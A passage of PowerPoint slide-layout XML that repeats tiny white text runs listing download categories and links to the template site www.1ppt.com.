              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout258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58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58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58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5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59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59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59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59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59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59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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout259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59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59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59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6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60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60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60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60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60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60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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout260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60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60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60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6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61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61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61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61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61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61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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
